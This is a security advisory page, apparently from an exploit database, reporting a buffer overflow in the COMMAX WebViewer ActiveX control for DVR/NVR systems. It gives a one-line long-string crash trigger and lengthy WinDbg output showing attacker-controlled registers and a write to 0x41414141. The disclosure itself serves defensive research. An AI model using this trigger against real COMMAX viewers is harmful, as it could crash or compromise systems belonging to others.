COMMAX WebViewer ActiveX Control 2.1.4.5 Commax_WebViewer.ocx Buffer Overflow

2021.09.01
Credit: LiquidWorm
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow # Date: 02.08.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.commax.com COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: 2.1.4.5 Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR. Desc: The vulnerability is caused due to a boundary error in the processing of user input, which can be exploited to cause a buffer overflow when a user inserts overly long array of string bytes through several functions. Successful exploitation could allow execution of arbitrary code on the affected node. Tested on: Microsoft Windows 10 Home (64bit) EN Microsoft Internet Explorer 20H2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5663 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php 02.08.2021 -- $ python >>> "A"*1000 [ToTheClipboard] >>>#Paste in ID or anywhere (5220.5b30): Access violation - code c0000005 (!!! second chance !!!) wow64!Wow64pNotifyDebugger+0x19918: 00007ff9`deb0b530 c644242001 mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00 0:038> g (5220.5b30): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL - CNC_Ctrl!DllUnregisterServer+0xf5501: 0b4d43bf f3aa rep stos byte ptr es:[edi] 0:038:x86> r eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141 eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 CNC_Ctrl!DllUnregisterServer+0xf5501: 0b4d43bf f3aa rep stos byte ptr es:[edi] 0:038:x86> !exchain 0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950) 0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20) CRT scope 0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806) func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f) 0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29) Invalid exception stack at ffffffff 0:038:x86> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501 01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c 02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67 03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7 0:038:x86> d esp 0d78f920 0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b ...........vx.~. 0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA.... 0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~..... 0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ... 0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x......... 0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v 0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v 0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t... 0:038:x86> d ebp 0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA.... 0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~..... 0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ... 0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x......... 0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v 0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v 0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t... 0d78f9a0 8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00 ................ 0:038:x86> d esi 41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0:038:x86> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** ERROR: Symbol file could not be found. Defaulted to export symbols for ie_to_edge_bho.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for Commax_WebViewer.OCX - GetUrlPageData2 (WinHttp) failed: 12002. DUMP_CLASS: 2 DUMP_QUALIFIER: 0 FAULTING_IP: CNC_Ctrl!DllUnregisterServer+f5501 0b4d43bf f3aa rep stos byte ptr es:[edi] EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 41414141 Attempt to write to address 41414141 FAULTING_THREAD: 00005b30 DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE PROCESS_NAME: IEXPLORE.EXE ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE_STR: c0000005 EXCEPTION_PARAMETER1: 00000001 EXCEPTION_PARAMETER2: 41414141 FOLLOWUP_IP: CNC_Ctrl!DllUnregisterServer+f5501 0b4d43bf f3aa rep stos byte ptr es:[edi] WRITE_ADDRESS: 41414141 WATSON_BKT_PROCSTAMP: 95286d96 WATSON_BKT_PROCVER: 11.0.19041.1 PROCESS_VER_PRODUCT: Internet Explorer WATSON_BKT_MODULE: CNC_Ctrl.DLL WATSON_BKT_MODSTAMP: 547ed821 WATSON_BKT_MODOFFSET: 1043bf WATSON_BKT_MODVER: 1.7.0.2 MODULE_VER_PRODUCT: CNC_Ctrl Module BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800) MODLIST_WITH_TSCHKSUM_HASH: aadfa1c5bdd8f77b979f6a5b222994db450b715e MODLIST_SHA1_HASH: 849cfdbdcb18d5749dc41f313fc544a643772db9 NTGLOBALFLAG: 0 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS: 0 PRODUCT_TYPE: 1 SUITE_MASK: 784 DUMP_TYPE: fe ANALYSIS_SESSION_HOST: LAB17 ANALYSIS_SESSION_TIME: 08-12-2021 14:20:11.0116 ANALYSIS_VERSION: 10.0.16299.91 amd64fre THREAD_ATTRIBUTES: OS_LOCALE: ENU PROBLEM_CLASSES: ID: [0n301] Type: [@ACCESS_VIOLATION] Class: Addendum Scope: BUCKET_ID Name: Omit Data: Omit PID: [Unspecified] TID: [0x5b30] Frame: [0] : CNC_Ctrl!DllUnregisterServer ID: [0n274] Type: [INVALID_POINTER_WRITE] Class: Primary Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [0x5b30] Frame: [0] : CNC_Ctrl!DllUnregisterServer ID: [0n152] Type: [ZEROED_STACK] Class: Addendum Scope: BUCKET_ID Name: Add Data: Omit PID: [0x5220] TID: [0x5b30] Frame: [0] : CNC_Ctrl!DllUnregisterServer BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT LAST_CONTROL_TRANSFER: from 0b405dea to 0b4d43bf STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7 THREAD_SHA1_HASH_MOD_FUNC: e84e62df4095d241971250198ae18de0797cfdc7 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 2033316a7c1a92aaeab1ce97e013350953fef546 THREAD_SHA1_HASH_MOD: 6d850af928076b326edbcafdf6dd4f771aafbab5 FAULT_INSTR_CODE: 458baaf3 SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+f5501 FOLLOWUP_NAME: MachineOwner MODULE_NAME: CNC_Ctrl IMAGE_NAME: CNC_Ctrl.DLL DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821 STACK_COMMAND: ~38s ; .cxr ; kb FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501 FAILURE_EXCEPTION_CODE: c0000005 FAILURE_IMAGE_NAME: CNC_Ctrl.DLL BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL FAILURE_MODULE_NAME: CNC_Ctrl BUCKET_ID_MODULE_STR: CNC_Ctrl FAILURE_FUNCTION_NAME: DllUnregisterServer BUCKET_ID_FUNCTION_STR: DllUnregisterServer BUCKET_ID_OFFSET: f5501 BUCKET_ID_MODTIMEDATESTAMP: 547ed821 BUCKET_ID_MODCHECKSUM: 357a4b BUCKET_ID_MODVER_STR: 1.7.0.2 BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_ FAILURE_PROBLEM_CLASS: APPLICATION_FAULT FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1 TARGET_TIME: 2021-08-12T12:21:50.000Z OSBUILD: 19042 OSSERVICEPACK: 1023 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt SingleUserTS Personal USER_LCID: 0 OSBUILD_TIMESTAMP: unknown_date BUILDDATESTAMP_STR: 160101.0800 BUILDLAB_STR: WinBuild BUILDOSVER_STR: 10.0.19041.1023 ANALYSIS_SESSION_ELAPSED_TIME: 1d869 ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b} Followup: MachineOwner ---------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top